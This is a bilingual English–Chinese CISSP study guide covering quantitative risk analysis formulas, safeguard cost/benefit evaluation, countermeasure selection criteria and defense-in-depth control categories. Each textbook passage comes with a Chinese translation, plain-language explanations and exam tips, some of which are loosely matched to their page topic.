Once a list of safeguards is obtained or produced for each risk, those safeguards should be evaluated as to their benefit and their cost relative to the assetthreat pair. This is the cost/benefit evaluation of safeguards. Legal and in Compliance Every organization needs to verify that its operations and policies are legal and in compliance with its stated security policies, industry obligations, contracts, and regulations. Auditing is necessary for compliance testing, also called compliance checking.

Verification that a system complies with laws, regulations, baselines, guidelines, standards, best practices, contracts, and policies is an important part of maintaining security in any environment. Compliance testing ensures that all necessary and required elements of a security solution are properly deployed and functioning as expected. These are all important considerations when selecting risk response strategies. Safeguards, security controls, and countermeasures will primarily reduce risk through a reduction in the potential rate of compromise (i.e., ARO). However,

中文直译 / 整理

网络安全保险通常是组织风险管理策略中的关键组成部分,尤其是在网络威胁 持续演变并带来重大财务和运营风险的背景下。 它有助于企业和个人将网络安 全事件相关的部分财务风险转移给保险公司,从而减轻潜在的财务负担,并在 面对网络威胁时提供安心感。 然而,投保人必须仔细审查其网络安全保险单的 条款、保障限额和条件,以确保其符合自身的具体需求和风险状况。 安全控制的成本与效益 在进行定量风险评估时,通常需要进行额外的计算,以评估防护措施的成本/效 益。 对于按重要性优先级排列的每项已识别风险,需考虑各种防护措施在降低 潜在损失和带来潜在效益方面的作用。 对于每个资产‑威胁配对(即已识别的风 险),必须列出所有可能和可用的防护措施。 这可能包括调查市场、咨询专家, 以及审查安全框架、法规和指南。 一旦为每项风险获得或生成了防护措施清单, 就应根据其相对于资产‑威胁配对的效益和成本进行评估。 这就是防护措施的成 本/效益评估。 法律与合规性 每个组织都需要验证其运营和政策是否合法,并符合其声明的安全政策、 行业义务、合同和法规。 审计是合规性测试(也称为合规性检查)所必需 的。

验证系统是否符合法律法规、基线、指南、标准、最佳实践、合同和 政策,是任何环境中维护安全的重要组成部分。 合规性测试确保安全解决 方案的所有必要和必需元素均已正确部署并按预期运行。 这些在选择风险 应对策略时都是重要的考虑因素。 防护措施、安全控制和应对措施主要通过降低潜在的 compromis 速率(即 ARO) 来降低风险。 然而,

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

审计:审计记录主体行为,用于追责、复盘和取证。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

没有日志和身份绑定,就很难问责。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
审计 审计记录主体行为,用于追责、复盘和取证。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 37 / PDF P176

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

some safeguards will also reduce the amount or severity of damage (i.e., EF). For those safeguards that only reduce the ARO, the amount of loss of a single realized event (i.e., SLE) is the same with or without the safeguard. But for those safeguards that also reduce the EF, any single realized event will cause less damage than if the safeguard was not present. Either way, a reduction of the ARO and potentially a reduction of the EF will result in a smaller ALE with the safeguard than without. Thus, this potential ALE with the safeguard should be calculated (ALE = AV * EF * ARO).

We can then consider the original asset-threat pair risk ALE as ALE1 (or ALE pre-safeguard) and the safeguard-specific ALE as ALE2 (or ALE post-safeguard). An ALE2 should be calculated for each potential safeguard for each asset-threat pair. The best of all possible safeguards would reduce the ARO to 0, although this is extremely unlikely. Any safeguard that is selected to be deployed will cost the organization something. It might not be purchase cost; it could be costs in terms of productivity loss, retraining, changes in business processes, or other opportunity costs. An estimation of the yearly costs for the safeguard to be present in the organization is needed.

This estimation can be called the annual cost of the safeguard (ACS). Several common factors affect ACS: Cost of purchase, development, and licensing Cost of implementation and customization Cost of annual operation, maintenance, administration, and so on Cost of annual repairs and upgrades Productivity improvement or loss Changes to environment Cost of testing and evaluation The value of the asset to be protected determines the maximum expenditures for protection mechanisms. Security should be cost-effective, and thus it is not prudent to spend more (in terms of cash or resources) protecting an asset than its value to the organization.

If the cost of the countermeasure is greater than the value of the asset (i.e., the cost of the risk), that safeguard should not be considered a reasonable option. Also, if the ACS is greater than the ALE1 (i.e., the potential annual loss of an asset due to a threat), then the

中文直译 / 整理

某些防护措施还会减少损害的程度或严重性(即 EF)。 对于仅降低 ARO 的防 护措施,单次实际事件造成的损失金额(即 SLE)在有无该防护措施的情况下 是相同的。 但对于同时降低 EF 的防护措施,任何单次实际事件造成的损害都 将小于没有该防护措施的情况。 无论哪种情况,降低 ARO 以及可能降低 EF 都 将导致实施防护措施后的 ALE 小于未实施时的 ALE。 因此,应计算该防护措 施下的潜在 ALE(ALE = AV * EF * ARO)。 随后,我们可以将原始资产‑威 胁对的风险 ALE 视为 ALE1(或 ALE 防护前),将特定防护措施的 ALE 视为 ALE2(或 ALE 防护后)。 对于每个资产‑威胁对,都应计算每种潜在防护措施 的 ALE2。 所有可能防护措施中最佳者应能将 ARO 降至 0,尽管这种情况极不 可能发生。 任何被选择部署的防护措施都会给组织带来一定的成本。 它可能不是采购成 本,而可能是生产力损失、再培训、业务流程变更或其他机会成本。 需要估 算该防护措施在组织内每年的成本。 此估算可称为防护措施的年成本( ACS)。

影响ACS的常见因素包括: 采购、开发和许可成本 实施和定制成本 年度运营、维护、管理等成本 年度维修和升级成本 生产力提升或损失 环境变更 测试与评估成本 待保护资产的价值决定了保护机制的最大支出。 安全性应具有成本效益,因此, 为资产投入超过其对组织价值的现金或资源是不明智的。 如果防护措施的成本 高于资产的价值(即风险成本),则该防护措施不应被视为合理选项。 此外, 如果ACS大于ALE1(即因威胁导致资产的潜在年损失),则

小白解释

场景先行:你是公司的安全负责人,正在读第 176 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

NIST:NIST 提供美国常用安全标准、框架和指南。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
NIST NIST 提供美国常用安全标准、框架和指南。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 38 / PDF P177

应有谨慎与尽职调查

一个偏采取合理行动,一个偏持续验证监督。

教材原文段落

safeguard is not a cost-effective solution. If no safeguard options are costeffective, then accepting the risk may be the only remaining option. Once you know the potential annual cost of a safeguard, you can then evaluate the benefit of that safeguard if applied to an infrastructure. The final computation in this process is the cost/benefit calculation, or cost/benefit analysis. This calculation is used to determine whether a safeguard actually improves security without costing too much.

To determine whether the safeguard is financially equitable, use the following formula: [ALE pre-safeguard – ALE post-safeguard] – annual cost of safeguard (ACS) = value of the safeguard to the company If the result is negative, the safeguard is not a financially responsible choice. If the result is positive, then that value is the annual savings your organization may reap by deploying the safeguard because the rate of occurrence is not a guarantee of occurrence. If multiple safeguards seem to have a positive cost/benefit result, then the safeguard with the largest benefit is the most cost-effective option.

The annual savings or loss from a safeguard should not be the only consideration when evaluating safeguards. You should also consider the issues of legal responsibility and prudent due care/due diligence. In some cases, it makes more sense to lose money in the deployment of a safeguard than to risk legal liability in the event of an asset disclosure or loss.

In review, to perform the cost/benefit analysis of a safeguard, you must calculate the following three elements: The pre-safeguard ALE for an asset-threat pairing The potential post-safeguard ALE for an asset-threat pairing The ACS (annual cost of the safeguard) With those elements, you can finally obtain a value for the cost/benefit formula for this specific safeguard against a specific risk against a specific asset: (pre-safeguard ALE – post-safeguard ALE) – ACS or, even more simply:

中文直译 / 整理

该防护措施不是成本效益方案。 如果没有防护措施具有成本效益,则接受风险 可能是唯一剩余的选项。 一旦您了解了某项防护措施的潜在年成本,就可以评估该防护措施应用于基础 设施时所带来的效益。 此过程中的最终计算是成本/效益计算,或成本/效益分析。 该计算用于确定某项防护措施是否在不造成过高成本的情况下真正提升了安全 性。 为判断该防护措施是否具有财务上的合理性,请使用以下公式: [实施防护措施前的ALE – 实施防护措施后的ALE] – 防护措施的年成本 (ACS)= 该防护措施对公司的价值 如果结果为负数,则该防护措施不是一项财务上负责任的选择。 如果结果为正 数,则该数值即为您的组织通过部署该防护措施可能实现的年节约额,因为事 件发生率并不保证一定会发生。 如果多项防护措施的成本/效益结果均为正数, 则效益最大的防护措施是最具成本效益的选项。 在评估防护措施时,防护措施带来的年节约额或损失不应是唯一的考量因素。 您还应考虑法律责任以及审慎尽责的问题。 在某些情况下,与其在资产泄露 或损失时面临法律追责,不如在部署防护措施时承受一定的经济损失。

综上所述,要执行一项防护措施的成本/效益分析,您必须计算以下三个要素: 资产‑威胁对的防护前年化损失预期(ALE) 资产‑威胁对的防护后潜在年化损失预期(ALE) ACS(防护措施的年成本) 通过这些要素,您最终可以得出针对特定资产的特定风险所采取的此项防 护措施的成本/效益公式值: (pre-safeguard ALE – post-safeguard ALE) – ACS 或者,更简单地说:

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:一个偏采取合理行动,一个偏持续验证监督。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

应有谨慎:应有谨慎是采取合理行动,像一个负责组织应该做的那样去做。

尽职调查:尽职调查是持续检查、验证和监督是否做到了。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“应有谨慎与尽职调查”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

Due care 偏“做正确的事”。

Due diligence 偏“确认事情被正确执行”。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
应有谨慎 应有谨慎是采取合理行动,像一个负责组织应该做的那样去做。
尽职调查 尽职调查是持续检查、验证和监督是否做到了。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 39 / PDF P178

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

(ALE1 – ALE2) – ACS The countermeasure with the greatest resulting value from this cost/benefit formula makes the most economic sense to deploy against the specific assetthreat pairing. It is important to realize that with all the calculations used in the quantitative risk assessment process (Table 2.2), the end values are used for prioritization and selection. The values themselves do not truly reflect real-world losses or costs due to security breaches. This should be obvious because of the level of guesswork, statistical analysis, and probability predictions required in the process.

TABLE 2.2 Quantitative risk analysis formulas Concept Formula or meaning Asset value (AV) $ Exposure factor (EF) % Loss Single loss expectancy (SLE) SLE = AV * EF Annualized rate of occurrence (ARO) # / year Annualized loss expectancy (ALE) ALE = SLE * ARO or ALE = AV * EF * ARO Annual cost of the safeguard (ACS) $ / year Value or benefit of a safeguard (i.e., cost/benefit equation) (ALE1 – ALE2) – ACS Once you have calculated a cost/benefit for each safeguard for each assetthreat pair, you must then sort these values. In most cases, the cost/benefit with the highest value is the best safeguard to implement for that specific risk against a specific asset.

But as with all things in the real world, this is only one part of the decision-making process. Although very important and often the primary guiding factor, it is not the sole element of data. Other items include actual cost, security budget, compatibility with existing systems, skill/knowledge base of IT staff, availability of products, political issues, partnerships, market trends, fads, marketing, contracts, and favoritism. As part of senior management or even the IT staff, it is your responsibility to either obtain or use all available data and information to make the best security decision for your organization.

For further discussion of safeguard, security control, and countermeasure selection issues, see the (ALE1 – ALE2) – ACS

中文直译 / 整理

根据这个成本/效益公式,产生最大价值的应对措施是最具经济效益的,适用 于特定资产‑威胁组合。 必须认识到,在定量风险评估过程中使用的所有计算(表2.2)中,最终值用于 优先级排序和选择。 这些值本身并不能真实反映因安全漏洞造成的实际损失或 成本。 这一点应该显而易见,因为该过程需要大量的推测、统计分析和概率预 测。 表2.2 定量风险分析公式 概念 公式或含义 资产价值(AV) $ 暴露因子 (EF) 损失百分比 单次损失预期 (SLE) SLE = AV * EF 年发生率 (ARO) 次数/年 年化预期损失(ALE) ALE = SLE * ARO 或 ALE = AV * EF * ARO 防护措施的年成本(ACS) 美元/年 防护措施的价值或收益(即 成本/收益方程) (ALE1 – ALE2) – ACS 一旦您为每个资产‑威胁对计算了每项防护措施的成本/效益,就必须对这些数值 进行排序。 在大多数情况下,成本/效益值最高的防护措施是最适合针对该特定 风险保护特定资产的。 但正如现实世界中的所有事物一样,这仅仅是决策过程 的一部分。 尽管它非常重要,且常常是主要的指导因素,但它并非唯一的决策 依据。

其他因素包括实际成本、安全预算、与现有系统的兼容性、IT人员的技 能/知识水平、产品可用性、政治问题、合作伙伴关系、市场趋势、潮流、市场 营销、合同和偏袒。 作为高级管理层或IT人员的一部分,您有责任获取或利用 所有可用的数据和信息,为您的组织做出最佳的安全决策。 有关防护措施、安 全控制和应对措施选择问题的进一步讨论,请参见本章后续的

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 40 / PDF P179

第 179 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

“Countermeasure Selection and Implementation” section later in this chapter. Most organizations have a limited and all-too-finite budget to work with. Thus, obtaining the best security for the cost is an essential part of security management. To effectively manage the security function, you must assess the budget, the benefit and performance metrics, and the necessary resources of each security control. Only after a thorough evaluation can you determine which controls are essential and beneficial not only to security, but also to your bottom line.

Generally, it is not an acceptable excuse that the reason the organization did not protect against an unacceptable threat or risk was solely because of a lack of funds. The entirety of safeguard selections needs to be considered in relation to the current budget. Compromise or adjustments of priorities may be necessary in order to reduce overall risk to an acceptable level with available resources. Keep in mind that organizational security should be based on a business case, be legally justifiable, and be reasonably in line with security frameworks, regulations, and best practices.

Countermeasure Selection and Implementation Selecting a countermeasure, safeguard, or control (short for security control) within the realm of risk management relies heavily on the cost/benefit analysis results. However, you should consider several other factors when assessing the value or pertinence of a security control: The cost of the countermeasure should be less than the value of the asset. The cost of the countermeasure should be less than the benefit of the countermeasure. The result of the applied countermeasure should make the cost of an attack greater for the perpetrator than the derived benefit from an attack.

The countermeasure should provide a solution to a real and identified problem. (Don't install countermeasures just because they are available, are advertised, or sound appealing.) The benefit of the countermeasure should not be dependent on its secrecy. Any viable countermeasure can withstand public disclosure and scrutiny and thus maintain protection even when known. The benefit of the countermeasure should be testable and verifiable. “

中文直译 / 整理

应对措施选择与实施”部分。 大多数组织的预算有限且极其有限。 因此,以成本获取最佳安全防护是安全管 理的重要组成部分。 要有效管理安全职能,您必须评估每项安全控制的预算、 收益与性能指标,以及所需资源。 只有经过全面评估后,您才能确定哪些控制 措施不仅对安全至关重要,而且对您的经营成果也有益处。 通常,以资金不足 为由未能防范不可接受的威胁或风险是不可接受的借口。 所有防护措施的选择 都必须结合当前预算进行综合考量。 为在现有资源下将整体风险降至可接受水 平,可能需要对优先级进行妥协或调整。 请记住,组织安全应基于商业论证, 具有法律依据,并合理符合安全框架、法规和最佳实践。 对策选择与实施 在风险管理领域选择对策、防护措施或控制措施(简称 安全控制)主要依赖于 成本/效益分析结果。 然而,在评估安全控制的价值或相关性时,您还应考虑其 他若干因素: 防护措施的成本应低于资产的价值。 防护措施的成本应低于该措施带来的收益。 所实施的防护措施应使攻击者所付出的成本高于其从攻击中获得的收益。 防护措施应针对一个真实且已识别的问题提供解决方案。 (不要仅仅因为 某项防护措施可用、被宣传或听起来吸引人就安装它。

) 防护措施的效益不应依赖于其机密性。 任何可行的防护措施都应能经受住 公开披露和审查,并在被知晓的情况下仍能保持保护效果。 该措施的好处应可测试和可验证。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 179 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 41 / PDF P180

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

The countermeasure should provide consistent and uniform protection across all users, systems, protocols, and so on. The countermeasure should have few or no dependencies to reduce cascade failures. The countermeasure should require minimal human intervention after initial deployment and configuration. The countermeasure should be tamperproof. The countermeasure should have overrides accessible to privileged operators only. The countermeasure should provide fail-safe and/or fail-secure options. Keep in mind that security should be designed to support and enable business tasks and functions. Thus, countermeasures and safeguards need to be evaluated in the context of a business process.

If there is no clear business case for a safeguard, it is probably not an effective security option. Security controls, countermeasures, and safeguards can be implemented administratively, logically/technically, or physically. These three categories of security mechanisms should be implemented in a conceptual layered defense-in-depth manner in order to provide maximum benefit (see Figure 2.4). This idea is based on the concept that policies (part of administrative controls) drive all aspects of security and thus form the initial protection layer around assets. Next, logical and technical controls provide protection against logical attacks and exploits.

Then, the physical controls provide protection against real-world physical attacks against the facility and devices.

中文直译 / 整理

该措施应为所有用户、系统、协议等提供一致且统一的保护。 该对策应尽量减少或不依赖其他组件,以降低级联故障的风险。 该对策在初始部署和配置后,应仅需最少的人工干预。 该对策应具有防篡改特性。 该对策应仅向特权操作员提供覆盖选项。 该对策应提供失效安全和/或失效安全选项。 请记住,安全性应设计为支持和促进业务任务与功能。 因此,对策和防护措施 需要在业务流程的背景下进行评估。 如果某项防护措施没有明确的业务依据, 那么它很可能不是一个有效的安全选项。 安全控制、对策和防护措施可以通过管理、逻辑/技术或物理方式实施。 这三类 安全机制应以概念性的分层纵深防御方式实施,以获得最大效益(见图 2.4)。 这一理念基于这样的概念:策略(管理控制的一部分)驱动安全的所有方面, 因此构成围绕资产的初始保护层。 接下来,逻辑和技术控制提供针对逻辑攻击 和利用的防护。 然后,物理控制提供针对设施和设备的现实世界物理攻击的防 护。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

纵深防御:纵深防御不是一道门,而是一层又一层控制。

分层:分层把控制按层排列,让攻击者必须连续突破。

NIST:NIST 提供美国常用安全标准、框架和指南。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

多层控制串联、避免单点失败,就是 defense in depth。

serial controls 更深,parallel controls 更宽;题目会考深度和广度。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
纵深防御 纵深防御不是一道门,而是一层又一层控制。
分层 分层把控制按层排列,让攻击者必须连续突破。
NIST NIST 提供美国常用安全标准、框架和指南。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 42 / PDF P181

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

FIGURE 2.4 The categories of security controls in a defense-in-depth implementation Administrative The category of administrative controls includes the policies and procedures defined by an organization's security policy and other regulations or requirements. They are sometimes referred to as management controls, managerial controls, or procedural controls. These controls focus on personnel oversight and business practices. Examples of administrative controls include policies, procedures, hiring practices, background checks, data classifications and labeling, security awareness and training efforts, reports and reviews, work supervision, personnel controls, and testing.

Technical or Logical The category of technical controls or logical controls involves the hardware or software mechanisms used to manage access and provide protection for IT

中文直译 / 整理

图 2.4深度防御实施中的安全控制类别 管理性 管理控制类别包括组织的安全策略以及其他法规或要求所定义的政策和程序。 它们有时被称为管理控制、管理层控制或程序控制。 这些控制侧重于人员监督 和业务实践。 管理控制的示例包括政策、程序、招聘实践、背景调查、数据分 类与标记、安全意识和培训工作、报告与审查、工作监督、人员控制以及测试。 技术性或逻辑性 技术控制技术控制或逻辑控制类别涉及用于管理访问并为IT提供保护的硬件或软件 机制

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

数据分类:数据分类按敏感度和价值给数据贴等级,决定保护强度。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

分类由数据所有者决定,保护由保管者实施。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
数据分类 数据分类按敏感度和价值给数据贴等级,决定保护强度。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 43 / PDF P182

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

resources and systems. Examples of logical or technical controls include authentication methods (such as passwords, smartcards, and biometrics), encryption, constrained interfaces, access control lists, protocols, firewalls, routers, and intrusion detection systems (IDSs). Physical Physical controls are security mechanisms focused on providing protection to the facility and real-world objects. Examples of physical controls include guards, fences, motion detectors, locked doors, sealed windows, lights, cable protection, laptop locks, badges, swipe cards, guard dogs, video cameras, access control vestibules, and alarms.

Applicable Types of Controls The term security control refers to a broad range of controls that perform such tasks as ensuring that only authorized users can log on and preventing unauthorized users from gaining access to resources. Controls mitigate a wide variety of information security risks. Whenever possible, you want to prevent any type of security problem or incident. Of course, this isn't always possible, and unwanted events occur. When they do, you want to detect the events as soon as possible. And once you detect an event, you want to correct it. As you read the control descriptions, notice that some are listed as examples of more than one access control type.

For example, a fence (or perimeterdefining device) placed around a building can be a preventive control (physically barring someone from gaining access to a building compound) and/or a deterrent control (discouraging someone from trying to gain access). Preventive A preventive control (aka preventative control) is deployed to thwart or stop unwanted or unauthorized activity from occurring.

Examples of preventive controls include fences, locks, authentication, access control vestibules, alarm systems, separation of duties, job rotation, data loss prevention (DLP), penetration testing, access control methods, encryption, auditing, security policies, security-awareness training, antimalware software, firewalls, and intrusion prevention systems (IPSs).

中文直译 / 整理

